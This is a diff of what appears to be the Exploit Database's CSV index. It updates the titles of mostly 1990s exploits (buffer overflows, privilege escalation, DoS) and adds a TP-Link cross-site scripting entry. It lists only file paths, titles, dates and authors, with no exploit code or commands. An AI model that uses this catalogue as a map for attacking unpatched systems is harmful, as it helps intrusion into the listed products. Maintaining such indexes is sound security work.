19127,platforms/multiple/remote/19127.txt,"Verity Search97 2.1 - Security",1998-07-14,"Stefan Arentz",multiple,remote,0 @@ -16566,7 +16568,7 @@ id,file,description,date,author,platform,type,port 19402,platforms/hardware/remote/19402.txt,"Western Digital's WD TV Live SMP/Hub - Root Exploit",2012-06-26,"Wolfgang Borst",hardware,remote,0 19163,platforms/irix/local/19163.sh,"SGI IRIX 6.4 ioconfig - Exploit",1998-07-20,Loneguard,irix,local,0 19164,platforms/windows/remote/19164.txt,"Microsoft Internet Explorer 4 - Clipboard Paste",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote,0 -19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0 / WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation",1999-02-04,Marc,windows,local,0 +19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0 / Ipswitch WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation",1999-02-04,Marc,windows,local,0 19168,platforms/unix/local/19168.sh,"SGI IRIX 6.5.4 / Solaris 2.5.1 - ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",unix,local,0 19172,platforms/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (1)",1997-04-26,cesaro,unix,local,0 19173,platforms/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (2)",1997-04-26,BeastMaster,unix,local,0 @@ -16574,6 +16576,7 @@ id,file,description,date,author,platform,type,port 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer - '.m3u' / '.ppl' Buffer Overflow (Metasploit)",2012-06-15,Metasploit,windows,local,0 19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4)",2012-06-15,Metasploit,windows,remote,0 +40432,platforms/hardware/webapps/40432.txt,"TP-Link Archer CR-700 - Cross-Site Scripting",2016-09-27,"Ayushman Dutta",hardware,webapps,0 19178,platforms/php/webapps/19178.txt,"webo site speedup 1.6.1 - Multiple Vulnerabilities",2012-06-16,dun,php,webapps,0 19179,platforms/php/webapps/19179.txt,"PHP Decoda 3.3.1 - Local File Inclusion",2012-06-16,"Number 7",php,webapps,0 19180,platforms/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0 @@ -16598,7 +16601,7 @@ id,file,description,date,author,platform,type,port 19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (1)",1997-08-25,bloodmask,unix,local,0 19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (2)",1997-08-25,jGgM,unix,local,0 19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (3)",1997-08-25,jGgM,unix,local,0 -19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin",1996-12-04,"Roger Espel Llima",unix,local,0 +19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin Exploit",1996-12-04,"Roger Espel Llima",unix,local,0 19388,platforms/windows/dos/19388.py,"Kingview Touchview 6.53 - EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,555 19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 dtprintinfo - Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 lpset - Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0 @@ -16613,9 +16616,9 @@ id,file,description,date,author,platform,type,port 19215,platforms/aix/local/19215.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (3)",1999-05-22,UNYUN,aix,local,0 19216,platforms/aix/local/19216.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (4)",1999-05-22,ahmed@securityfocus.com,aix,local,0 19217,platforms/aix/local/19217.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (5)",1999-05-22,UNYUN,aix,local,0 -19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U 2.5 - Buffer Overflow",1999-05-03,"Arne Vidstrom",linux,remote,0 -19219,platforms/linux/remote/19219.c,"BisonWare BisonWare FTP Server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote,0 -19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - CFCRYPT.EXE",1998-05-19,"Matt Chapman",windows,local,0 +19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U FTP Server 2.5 - Buffer Overflow",1999-05-03,"Arne Vidstrom",linux,remote,0 +19219,platforms/linux/remote/19219.c,"BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote,0 +19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Exploit",1998-05-19,"Matt Chapman",windows,local,0 19221,platforms/multiple/remote/19221.txt,"SmartDesk WebSuite 2.1 - Buffer Overflow",1999-05-25,cmart,multiple,remote,0 19222,platforms/multiple/remote/19222.txt,"Gordano NTMail 4.2 - Web File Access",1999-05-25,Marc,multiple,remote,0 19223,platforms/multiple/remote/19223.txt,"FloosieTek FTGate 2.1 - Web File Access",1999-05-25,Marc,multiple,remote,0 @@ -16623,7 +16626,7 @@ id,file,description,date,author,platform,type,port 19225,platforms/multiple/dos/19225.txt,"Compaq Client Management Agents 3.70/4.0 / Insight Management Agents 4.21 A/4.22 A/4.30 A / Intelligent Cluster Administrator 1.0 / Management Agents for Workstations 4.20 A / Server Management Agents 4.23 / Survey Utility 2.0 - Web File Access",1999-05-25,"Master Dogen",multiple,dos,0 19226,platforms/linux/remote/19226.c,"University of Washington pop2d 4.4 - Buffer Overflow",1999-05-26,"Chris Evans",linux,remote,0 19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0 - Exploit",1999-05-10,"Thomas Krug",windows,local,0 -19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA",1999-05-25,"J. Abreu Junior",multiple,dos,0 +19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA Exploit",1999-05-25,"J. Abreu Junior",multiple,dos,0 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0 19230,platforms/multiple/dos/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service",1999-05-11,"Chris Radigan",multiple,dos,0 19231,platforms/windows/remote/19231.rb,"PHP - apache_request_headers Function Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,remote,0 @@ -16645,17 +16648,17 @@ id,file,description,date,author,platform,type,port 19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote,0 19248,platforms/windows/remote/19248.c,"Microsoft IIS 4.0 - Buffer Overflow (4)",1999-06-15,"Greg Hoglund",windows,remote,0 19249,platforms/linux/local/19249.c,"Xcmail 0.99.6 - Exploit",1999-03-02,Arthur,linux,local,0 -19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0 / 2.1 / 2.2 - autofs",1999-02-19,"Brian Jones",linux,dos,0 +19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0 / 2.1 / 2.2 - autofs Exploit",1999-02-19,"Brian Jones",linux,dos,0 19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four and Zero Header Length",1999-06-16,badi,linux,remote,0 19401,platforms/windows/local/19401.txt,"Apple QuickTime - QuickTime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 -19253,platforms/linux/remote/19253.txt,"Debian 2.1 - httpd",1999-06-17,anonymous,linux,remote,0 -19254,platforms/linux/local/19254.c,"S.u.S.E. 5.2 - gnuplot",1999-03-04,xnec,linux,local,0 +19253,platforms/linux/remote/19253.txt,"Debian 2.1 - httpd Exploit",1999-06-17,anonymous,linux,remote,0 +19254,platforms/linux/local/19254.c,"S.u.S.E. Linux 5.2 - gnuplot Exploit",1999-03-04,xnec,linux,local,0 19255,platforms/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 - No Logging",1999-06-09,"Tani Hosokawa",linux,local,0 -19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd",1999-01-03,anonymous,linux,local,0 +19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd Exploit",1999-01-03,anonymous,linux,local,0 19257,platforms/linux/local/19257.c,"X11R6 3.3.3 - Symlink",1999-03-21,Stealthf0rk,linux,local,0 19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core - Exploit",1999-01-07,"John McDonald",solaris,local,0 19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc - Exploit",1999-02-03,xnec,linux,local,0 -19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - /usr/lib/netaddpr",1997-05-09,"Jaechul Choe",irix,local,0 +19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - /usr/lib/netaddpr Exploit",1997-05-09,"Jaechul Choe",irix,local,0 19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0 19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 cdplayer - Exploit",1996-11-21,"Yuri Volobuev",irix,local,0 19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0 @@ -16668,13 +16671,13 @@ id,file,description,date,author,platform,type,port 19270,platforms/linux/local/19270.c,"Debian 2.0 - Super Syslog Buffer Overflow",1999-02-25,c0nd0r,linux,local,0 19271,platforms/linux/dos/19271.c,"Linux Kernel 2.0 - TCP Port Denial of Service",1999-01-19,"David Schwartz",linux,dos,0 19272,platforms/linux/dos/19272.txt,"Linux Kernel 2.2 - 'ldd core' Force Reboot",1999-01-26,"Dan Burcaw",linux,dos,0 -19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier",1997-05-16,"Mike Neuman",irix,local,0 +19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier Exploit",1997-05-16,"Mike Neuman",irix,local,0 19274,platforms/irix/local/19274.c,"SGI IRIX 6.3 df - Exploit",1997-05-24,"David Hedley",irix,local,0 -19275,platforms/irix/local/19275.c,"SGI IRIX 6.4 - datman/cdman",1996-12-09,"Yuri Volobuev",irix,local,0 +19275,platforms/irix/local/19275.c,"SGI IRIX 6.4 - datman/cdman Exploit",1996-12-09,"Yuri Volobuev",irix,local,0 19276,platforms/irix/local/19276.c,"SGI IRIX 6.2 - eject Exploit (1)",1997-05-25,DCRH,irix,local,0 19277,platforms/irix/local/19277.c,"SGI IRIX 6.2 - eject Exploit (2)",1997-05-25,"Last Stage of Delirium",irix,local,0 19278,platforms/hp-ux/dos/19278.pl,"HP HP-UX 10.20 / IBM AIX 4.1.5 - connect() Denial of Service",1997-03-05,"Cahya Wirawan",hp-ux,dos,0 -19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - abuse.console",1996-02-02,"David J Meltzer",linux,local,0 +19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - abuse.console Exploit",1996-02-02,"David J Meltzer",linux,local,0 19280,platforms/irix/local/19280.txt,"SGI IRIX 6.2 fsdump - Exploit",1996-12-03,"Jaechul Choe",irix,local,0 19281,platforms/linux/local/19281.c,"RedHat Linux 5.1 xosview - Exploit",1999-05-28,"Chris Evans",linux,local,0 19282,platforms/linux/dos/19282.c,"Linux Kernel 2.0 Sendmail - Denial of Service",1999-05-28,"Michal Zalewski",linux,dos,0 @@ -16695,18 +16698,18 @@ id,file,description,date,author,platform,type,port 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",linux,local,0 19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 sdrd - Exploit",1998-08-05,"Chuck Athey and Jim Garlick",linux,remote,0 19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 cgi-bin wrap - Exploit",1997-04-19,"J.A. Gutierrez",multiple,remote,0 -19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin webdist.cgi",1997-05-06,anonymous,multiple,remote,0 +19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin webdist.cgi Exploit",1997-05-06,anonymous,multiple,remote,0 19300,platforms/aix/local/19300.txt,"IBM AIX 4.2.1 snap - Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",aix,local,0 19301,platforms/linux/dos/19301.c,"Linux Kernel 2.0.33 - IP Fragment Overlap",1998-04-17,"Michal Zalewski",linux,dos,0 19302,platforms/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH",1998-01-19,Solar,linux,local,0 -19303,platforms/multiple/remote/19303.txt,"SGI IRIX 6.4 - cgi-bin handler",1997-06-16,"Razvan Dragomirescu",multiple,remote,0 +19303,platforms/multiple/remote/19303.txt,"SGI IRIX 6.4 - cgi-bin handler Exploit",1997-06-16,"Razvan Dragomirescu",multiple,remote,0 19304,platforms/irix/local/19304.txt,"SGI IRIX 6.4 inpview - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 19305,platforms/linux/local/19305.c,"RedHat Linux 5.0 msgchk - Exploit",1998-01-19,"Cesar Tascon Alvarez",linux,local,0 19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation Vulnerabilities",1997-10-29,"BM ERS Team",aix,local,0 19307,platforms/aix/local/19307.c,"IBM AIX 4.2 ping - Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 19308,platforms/linux/dos/19308.c,"Linux Kernel 2.0 / 2.0.33 - i_count Overflow (PoC)",1998-01-14,"Aleph One",linux,dos,0 19309,platforms/aix/local/19309.c,"IBM AIX 4.2 lchangelv - Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 -19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 - login",1997-05-26,"David Hedley",irix,local,0 +19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 - login Exploit",1997-05-26,"David Hedley",irix,local,0 19311,platforms/linux/local/19311.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 mailx - Exploit (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 19312,platforms/linux/local/19312.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 mailx - Exploit (2)",1998-06-25,segv,linux,local,0 19313,platforms/irix/local/19313.txt,"SGI IRIX 6.4 netprint - Exploit",1997-01-04,"Yuri Volobuev",irix,local,0 @@ -16743,11 +16746,11 @@ id,file,description,date,author,platform,type,port 19341,platforms/solaris/local/19341.c,"Solaris 2.5.1 kcms - Buffer Overflow (1)",1998-12-24,"Cheez Whiz",solaris,local,0 19342,platforms/solaris/local/19342.c,"Solaris 2.5.1 kcms - Buffer Overflow (2)",1998-12-24,UNYUN,solaris,local,0 19343,platforms/solaris/local/19343.c,"Solaris 2.5.1 - rsh socket Descriptor",1997-06-19,"Alan Cox",solaris,local,0 -19344,platforms/aix/local/19344.sh,"IBM AIX 3.2.5 - IFS",1994-04-02,anonymous,aix,local,0 +19344,platforms/aix/local/19344.sh,"IBM AIX 3.2.5 - IFS Exploit",1994-04-02,anonymous,aix,local,0 19345,platforms/aix/local/19345.txt,"IBM AIX 4.2.1 lquerypv - Exploit",1996-11-24,Aleph1,aix,local,0 19346,platforms/freebsd/local/19346.c,"FreeBSD 3.1 / Solaris 2.6 - Domain Socket",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 19347,platforms/irix/local/19347.c,"SGI IRIX 6.3 pset - Exploit",1997-07-17,"Last Stage of Delirium",irix,local,0 -19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - login(1)",1996-12-04,anonymous,aix,remote,0 +19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - login(1) Exploit",1996-12-04,anonymous,aix,remote,0 19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 rmail - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 19350,platforms/solaris/local/19350.sh,"Solaris 2.5.1 - License Manager",1998-10-21,"Joel Eriksson",solaris,local,0 19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 serial_ports - Exploit",1994-02-02,transit,irix,local,0 @@ -16797,8 +16800,8 @@ id,file,description,date,author,platform,type,port 19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)",1999-07-13,jGgM,multiple,remote,0 19422,platforms/linux/local/19422.txt,"BMC Software Patrol 3.2.5 - Patrol SNMP Agent File Creation/Permission",1999-07-14,"Andrew Alness",linux,local,0 19423,platforms/bsd/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0 -19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (1)",1999-07-19,"rain forest puppy",windows,remote,0 -19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0 +19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS Exploit (1)",1999-07-19,"rain forest puppy",windows,remote,0 +19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS Exploit (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0 19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0 / SGI IRIX 6.5.4 / SGI UNICOS 10.0 6 - arrayd.auth Default Configuration",1999-07-19,"Last Stage of Delirium",multiple,remote,0 19427,platforms/osx/local/19427.txt,"Apple At Ease 5.0 - Exploit",1999-05-13,"Tim Conrad",osx,local,0 19428,platforms/linux/local/19428.c,"Samba < 2.0.5 - Exploit",1999-07-21,"Gerald Britton",linux,local,0 @@ -16824,7 +16827,7 @@ id,file,description,date,author,platform,type,port 19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow",1999-08-03,UNYUN,windows,remote,0 19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R - 'Topic' Buffer Overflow",1999-08-03,UNYUN,windows,remote,0 19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 - Buffer Overflow",1999-08-08,UNYUN,windows,remote,0 -19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,multiple,remote,0 +19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP Exploit",1999-08-11,L0pth,multiple,remote,0 19452,platforms/php/webapps/19452.txt,"phpmoneybooks 1.03 - Persistent Cross-Site Scripting",2012-06-29,chap0,php,webapps,0 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local Denial of Service",2012-06-29,0in,windows,dos,0 19455,platforms/windows/webapps/19455.txt,"specview 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi Auriemma",windows,webapps,0 @@ -16839,7 +16842,7 @@ id,file,description,date,author,platform,type,port 19464,platforms/linux/local/19464.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 19465,platforms/linux/local/19465.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Exploit",1999-08-18,"Gregory Duchemin",multiple,remote,0 -19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 - pt_chown",1999-08-23,"Michal Zalewski",linux,local,0 +19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 - pt_chown Exploit",1999-08-23,"Michal Zalewski",linux,local,0 19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0 19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (1)",1999-08-30,Akke,linux,local,0 19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (2)",1999-08-25,jbowie,linux,local,0 @@ -16870,12 +16873,12 @@ id,file,description,date,author,platform,type,port 19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 - POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19497,platforms/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",multiple,local,0 -19498,platforms/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - dtspcd",1999-09-13,"Job de Haas of ITSX",multiple,local,0 +19498,platforms/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - dtspcd Exploit",1999-09-13,"Job de Haas of ITSX",multiple,local,0 19499,platforms/linux/local/19499.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (1)",1999-09-09,"Brock Tellier",linux,local,0 19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0 19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 / SunOS 4.1.4 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",linux,local,0 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0 -19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf",1999-09-17,"Tymm Twillman",linux,remote,0 +19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf Exploit",1999-09-17,"Tymm Twillman",linux,remote,0 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",freebsd,local,0 19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0 19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3 / ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix - Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 @@ -16907,10 +16910,10 @@ id,file,description,date,author,platform,type,port 19533,platforms/solaris/local/19533.c,"Solaris 7.0 ufsdump - Local Buffer Overflow (1)",1998-04-23,smm,solaris,local,0 19534,platforms/solaris/local/19534.c,"Solaris 7.0 ufsdump - Local Buffer Overflow (2)",1998-12-30,"Cheez Whiz",solaris,local,0 19535,platforms/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp - Exploit",1996-12-01,SOD,hp-ux,local,0 -19536,platforms/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",multiple,dos,0 +19536,platforms/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi Exploit",1996-12-10,"Josh Richards",multiple,dos,0 19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote,0 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote,0 -19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - IFRAME",1999-10-11,"Georgi Guninski",windows,remote,0 +19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit",1999-10-11,"Georgi Guninski",windows,remote,0 19540,platforms/windows/remote/19540.txt,"t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",windows,remote,0 19541,platforms/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",novell,dos,0 19542,platforms/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' symlink",1999-10-11,"Brock Tellier",sco,local,0 @@ -16922,9 +16925,9 @@ id,file,description,date,author,platform,type,port 19548,platforms/php/webapps/19548.txt,"gpEasy CMS Minishop 1.5 Plugin - Persistent Cross-Site Scripting",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps,0 19549,platforms/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",php,webapps,0 19550,platforms/php/webapps/19550.txt,"phpMyBackupPro 2.2 - Local File Inclusion",2012-07-03,dun,php,webapps,0 -19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 -19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",multiple,local,0 -19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog",1997-10-19,"Bryan Berg",php,remote,0 +19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 +19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (2)",1997-02-13,"Solar Designer",multiple,local,0 +19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog Exploit",1997-10-19,"Bryan Berg",php,remote,0 19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 Exploit (1)",1998-03-16,Rootshell,hardware,remote,0 19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 Exploit (2)",1998-03-17,Rootshell,hardware,remote,0 